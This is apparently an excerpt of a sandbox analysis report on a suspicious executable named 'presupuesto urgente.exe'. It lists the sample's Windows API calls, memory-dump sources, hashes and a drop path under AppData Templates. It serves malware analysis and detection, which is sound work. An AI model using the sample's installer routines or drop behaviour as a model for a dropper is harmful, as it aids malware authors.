                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405891
                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004058C5
                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
                                                                                                                                                      • CloseClipboard.USER32 ref: 004058D6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                      • String ID: (7B${
                                                                                                                                                      • API String ID: 590372296-525222780
                                                                                                                                                      • Opcode ID: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                                                                                                                      • Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
                                                                                                                                                      • Opcode Fuzzy Hash: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                                                                                                                      • Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DA8
                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DB3
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404E10
                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404E86
                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404FE0
                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004051B0
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004051C0
                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405311
                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040535F
                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040536A
                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405371
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                      • String ID: $M$N
                                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                                      • Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                                                                                      • Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
                                                                                                                                                      • Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                                                                                      • Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404863
                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0040488D
                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040493E
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404949
                                                                                                                                                      • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 0040497B
                                                                                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404987
                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999
                                                                                                                                                        • Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09
                                                                                                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                                                                        • Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A5C
                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77
                                                                                                                                                        • Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                                                                                        • Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
                                                                                                                                                        • Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                      • String ID: (7B$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call
                                                                                                                                                      • API String ID: 2624150263-212780734
                                                                                                                                                      • Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                                                                                                      • Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
                                                                                                                                                      • Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                                                                                                      • Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D
                                                                                                                                                      APIs
                                                                                                                                                      • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet, xrefs: 004021BD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet
                                                                                                                                                      • API String ID: 542301482-3950974724
                                                                                                                                                      • Opcode ID: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                                                                                                                      • Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
                                                                                                                                                      • Opcode Fuzzy Hash: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                                                                                                                      • Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                      • Opcode ID: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
                                                                                                                                                      • Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
                                                                                                                                                      • Opcode Fuzzy Hash: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
                                                                                                                                                      • Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A
                                                                                                                                                      APIs
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
                                                                                                                                                      • ShowWindow.USER32(?), ref: 00403EC5
                                                                                                                                                      • DestroyWindow.USER32 ref: 00403ED9
                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403F16
                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F31
                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403FDF
                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403FE9
                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404003
                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404054
                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 004040FA
                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 0040411B
                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 0040412D
                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404148
                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415E
                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404165
                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417D
                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
                                                                                                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
                                                                                                                                                      • SetWindowTextW.USER32(?,00423728), ref: 004041CE
                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404302
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                      • String ID: (7B
                                                                                                                                                      • API String ID: 184305955-3251261122
                                                                                                                                                      • Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                                                                                                      • Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
                                                                                                                                                      • Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                                                                                                      • Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E
                                                                                                                                                      APIs
                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404580
                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404594
                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045B1
                                                                                                                                                      • GetSysColor.USER32(?), ref: 004045C2
                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004045E3
                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040465E
                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404665
                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404690
                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004046E4
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404700
                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040472F
                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                      • String ID: Call$N$YD@
                                                                                                                                                      • API String ID: 3103080414-3276248472
                                                                                                                                                      • Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                                                                                                      • Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
                                                                                                                                                      • Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                                                                                                      • Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58
                                                                                                                                                      APIs
                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                      • String ID: F
                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                      • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                                                      • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                                                      • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                                                      • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406197,?,?), ref: 00406037
                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040
                                                                                                                                                        • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                                                                                        • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
                                                                                                                                                      • wsprintfA.USER32 ref: 0040607B
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
                                                                                                                                                      • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
